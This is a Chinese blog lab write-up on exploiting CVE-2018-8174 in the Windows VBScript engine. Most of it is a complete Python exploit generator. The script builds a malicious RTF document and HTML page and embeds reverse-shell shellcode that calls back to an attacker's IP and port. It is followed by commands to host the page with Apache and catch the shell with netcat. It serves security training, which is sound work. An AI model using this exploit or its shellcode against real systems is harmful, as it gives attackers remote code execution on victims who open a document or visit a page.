-->
当前位置:首页 > 实验 > 正文内容

CVE-2018-8174漏洞 实验

Luz3年前 (2020-12-12)实验1953

实验目的

  • 由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码。

实验原理

  • CVE-2018-8174 是 Windows VBScript Engine 代码执行漏洞。 微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该 0day 漏洞进行了修复,将其命名为 CVE-2018-8174 由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码。

实验环境

1.操作系统
  操作机:ubuntu
  目标机:windows7

实验步骤

步骤1:生成带有恶意页面和文档

1.1生成带有恶意 VBS代码的html文件与word 文档

poc内容:

import argparse    
import struct    
SampleRTF = R"""{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}    
{\*\generator Msftedit 5.41.21.2510;}\viewkind4\uc1\pard\sa200\sl276\slmult1\lang9\f0\fs22{\object\objautlink\objupdate\rsltpict\objw4321\objh4321{\*\objclass htmlfile}{\*\objdata 0105000002000000090000004f4c45324c696e6b000000000000000000000a0000    
d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff    
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff    
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff    
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff    
fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff    
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff    
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff    
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff    
ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000903b    
beae04f2d30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000    
000000000000000000000000f20000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000    
0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000    
000000000000000000000000050000008100000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff    
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff    
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff    
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff    
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000021000c0000005f31353838343937393534000000000080000000e0c9ea79f9bace118c8200aa004ba90b68000000    
UNICODE_URL    
000000795881f43b1d7f48af2c825dc485276300000000a5ab0000ffffffff20693325f903cf118fd000aa00686f1300000000ffffffff0000    
000000000000e05dd6ab04f2d30100000000000000000000000000000000000000000000100203000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002700    
NORMAL_URL    
0000bbbbcccc2700    
UNICODE_URL    
0000000000000000000000000000000000000000000000000000    
0000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000d0000004d45544146494c45504943540000000000000000005e0000000800000000000000    
0100090000032b00000000000500000000000400000003010800050000000b0200000000050000000c0200000000030000001e00050000000d0200000000050000000d0200000000040000002701ffff030000000000}    
}\par    
}    
"""    
SampleHTML = R"""    
<!doctype html>    
<html>    
<head>    
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">    
<meta http-equiv="x-ua-compatible" content="IE=10">    
<meta http-equiv="Expires" content="0">    
<meta http-equiv="Pragma" content="no-cache">    
<meta http-equiv="Cache-control" content="no-cache">    
<meta http-equiv="Cache" content="no-cache">    
</head>    
<body>    
</script>    
</body>    
</html>    
"""    
reverseip = '1.1.1.1'    
reverseport = 4444    
def create_rtf_file(url,filename):    
    NORMAL_URL = url.encode('hex')+"0"*(78-len(url.encode('hex')))    
    UNICODE_URL = "00".join("{:02x}".format(ord(c)) for c in url)    
    if len(UNICODE_URL) < 154:    
        print 'UNICODE_URL len %d , need to pad ...' % len(UNICODE_URL)    
        UNICODE_URL = UNICODE_URL+"0"*(154 - len(UNICODE_URL))    
    res = SampleRTF.replace('NORMAL_URL',NORMAL_URL).replace('UNICODE_URL',UNICODE_URL)    
    f = open(filename, 'w')    
    f.write(res)    
    f.close()    
    print "Generated "+filename+" successfully"    
def rev_shellcode(ip,port):    
    ip = [int(i) for i in ip.split(".")]    
    buf =  ""    
    buf += "\xfc\xe9\x8a\x00\x00\x00\x5d\x83\xc5\x0b\x81\xc4\x70"    
    buf += "\xfe\xff\xff\x8d\x54\x24\x60\x52\x68\xb1\x4a\x6b\xb1"    
    buf += "\xff\xd5\x8d\x44\x24\x60\xeb\x5c\x5e\x8d\x78\x60\x57"    
    buf += "\x50\x31\xdb\x53\x53\x68\x04\x00\x00\x08\x53\x53\x53"    
    buf += "\x56\x53\x68\x79\xcc\x3f\x86\xff\xd5\x85\xc0\x74\x59"    
    buf += "\x6a\x40\x80\xc7\x10\x53\x53\x31\xdb\x53\xff\x37\x68"    
    buf += "\xae\x87\x92\x3f\xff\xd5\x54\x68\x44\x01\x00\x00\xeb"    
    buf += "\x39\x50\xff\x37\x68\xc5\xd8\xbd\xe7\xff\xd5\x53\x53"    
    buf += "\x53\x8b\x4c\x24\xfc\x51\x53\x53\xff\x37\x68\xc6\xac"    
    buf += "\x9a\x79\xff\xd5\xe9\x41\x01\x00\x00\xe8\x9f\xff\xff"    
    buf += "\xff\x72\x75\x6e\x64\x6c\x6c\x33\x32\x2e\x65\x78\x65"    
    buf += "\x00\xe8\x71\xff\xff\xff\xe8\xc2\xff\xff\xff\xfc\xe8"    
    buf += "\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"    
    buf += "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"    
    buf += "\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01"    
    buf += "\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c"    
    buf += "\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b"    
    buf += "\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac"    
    buf += "\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b"    
    buf += "\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c"    
    buf += "\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44"    
    buf += "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"    
    buf += "\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73"    
    buf += "\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"    
    buf += "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5"    
    buf += "\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0"    
    buf += "\xff\xd5\x97\x6a\x05\x68"+struct.pack("!4B",ip[0],ip[1],ip[2],ip[3])+"\x68\x02\x00"    
    buf += struct.pack("!H",port)+"\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"    
    buf += "\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0"    
    buf += "\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57"    
    buf += "\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44"    
    buf += "\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50"    
    buf += "\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc"    
    buf += "\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08"    
    buf += "\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95"    
    buf += "\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05"    
    buf += "\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"    
    return buf.encode("hex")    
def gen_shellcode(s):    
    n = len(s)    
    i = 0    
    strs = ''    
    if n % 4 == 2:    
        s=s+'41'    
    while i <n:    
        strs += '%u'+s[i+2:i+4]+s[i:i+2]    
        i+=4    
    return strs    
if __name__ == '__main__':    
    parser = argparse.ArgumentParser(description="Exploit for CVE-2018-8174")    
    parser.add_argument("-u", "--url", help="exp url", required=True)    
    parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)    
    parser.add_argument('-i', "--ip", help="ip for netcat", required=False)    
    parser.add_argument('-p', "--port", help="port for netcat", required=False)    
    args = parser.parse_args()    
    url = args.url    
    filename = args.output    
    create_rtf_file(url,filename)    
    if args.ip and args.port:    
        ip = str(args.ip)    
        port = int(args.port)    
        shellcode = gen_shellcode(rev_shellcode(ip,port))    
    else:    
        shellcode = gen_shellcode(rev_shellcode(reverseip,reverseport))    
    res = SampleHTML.replace('REPLACE_SHELLCODE_HERE',shellcode)    
    f = open('exploit.html', 'w')    
    f.write(res)    
    f.close()    
    print "!!! Completed !!!"


   python CVE-2018-8174.py -u http://10.143.0.22/exploit.html -o msf.rtf -i 10.143.0.22 -p 4444

 

   -uURL 地址

   -o:生成文档

   -i:监听地址

   -p:监听端口

 

图1

  1.2.把生成的explot.html 复制到网站目录,并重启apache 服务

ls

cp exploit.html /var/www/html/

service apache2 restart

 

图2

  1.3.监听4444端口

nc -lvvp 4444

 

图3

步骤2:使用靶机访问

2.1 目标机访问恶意URL

 

图4

  2.2.切换回操作机接收shell

 

图5

 

 

图6

  2.3.将msf.rtf文件复制到网站目录下,使用目标机访问url下载

 

图7

 

 

图8

  2.4.使用nc监听,在目标机打开下载的文档后,操作机将同样收到会话

 

图9

 

 

图10

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。